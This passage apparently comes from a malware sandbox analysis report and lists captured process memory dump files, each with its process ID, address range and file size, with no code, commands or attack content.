memory/3856-395-0x00007FF79A460000-0x00007FF79AE45000-memory.dmpFilesize
9.9MB
-
memory/4048-154-0x0000000005B30000-0x0000000005B4E000-memory.dmpFilesize
120KB
-
memory/4048-143-0x0000000004C00000-0x0000000004C66000-memory.dmpFilesize
408KB
-
memory/4048-140-0x0000000002530000-0x0000000002566000-memory.dmpFilesize
216KB
-
memory/4048-141-0x0000000004F80000-0x00000000055A8000-memory.dmpFilesize
6.2MB
-
memory/4048-155-0x0000000004940000-0x0000000004950000-memory.dmpFilesize
64KB
-
memory/4048-142-0x0000000004940000-0x0000000004950000-memory.dmpFilesize
64KB
-
memory/4048-157-0x0000000006030000-0x000000000604A000-memory.dmpFilesize
104KB
-
memory/4048-156-0x0000000007190000-0x000000000780A000-memory.dmpFilesize
6.5MB
-
memory/4048-144-0x0000000004DA0000-0x0000000004E06000-memory.dmpFilesize
408KB
-
memory/4048-163-0x0000000004940000-0x0000000004950000-memory.dmpFilesize
64KB
-
memory/4048-161-0x0000000004940000-0x0000000004950000-memory.dmpFilesize
64KB
-
memory/4048-162-0x0000000004940000-0x0000000004950000-memory.dmpFilesize
64KB
-
memory/4108-465-0x0000000005240000-0x0000000005250000-memory.dmpFilesize
64KB
-
memory/4108-431-0x0000000005240000-0x0000000005250000-memory.dmpFilesize
64KB
-
memory/4108-432-0x0000000005240000-0x0000000005250000-memory.dmpFilesize
64KB
-
memory/4108-464-0x0000000005240000-0x0000000005250000-memory.dmpFilesize
64KB
-
memory/4172-394-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4172-382-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4172-381-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4172-380-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4172-377-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4280-365-0x0000021FA4300000-0x0000021FA4310000-memory.dmpFilesize
64KB
-
memory/4280-359-0x0000021FA4300000-0x0000021FA4310000-memory.dmpFilesize
64KB
-
memory/4280-358-0x0000021FA4300000-0x0000021FA4310000-memory.dmpFilesize
64KB
-
memory/4280-370-0x00007FF4E53F0000-0x00007FF4E5400000-memory.dmpFilesize
64KB
-
memory/4544-295-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4544-298-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4544-176-0x0000000000CF0000-0x00000000017F8000-memory.dmpFilesize
11.0MB
-
memory/4544-258-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4544-171-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4544-299-0x0000000000CF0000-0x00000000017F8000-memory.dmpFilesize
11.0MB
-
memory/4544-170-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4544-167-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4544-175-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4544-174-0x0000000000CF0000-0x00000000017F8000-memory.dmpFilesize
11.0MB
-
memory/4544-188-0x0000000061E00000-0x0000000061EF3000-memory.dmpFilesize
972KB
-
memory/4544-173-0x0000000000400000-0x000000000046C000-memory.dmpFilesize
432KB
-
memory/4600-396-0x0000000004FB0000-0x0000000004FC0000-memory.dmpFilesize
64KB
-
memory/4600-434-0x0000000004FB0000-0x0000000004FC0000-memory.dmpFilesize
64KB
-
memory/4680-480-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4680-482-0x0000000000400000-0x0000000000484000-memory.dmpFilesize
528KB
-
memory/4756-467-0x000001B2A7400000-0x000001B2A7410000-memory.dmpFilesize
64KB
-
memory/4756-454-0x000001B2A7400000-0x000001B2A7410000-memory.dmpFilesize
64KB
-
memory/4756-453-0x000001B2A7400000-0x000001B2A7410000-memory.dmpFilesize
64KB
-
memory/4756-452-0x000001B2A7400000-0x000001B2A7410000-memory.dmpFilesize
64KB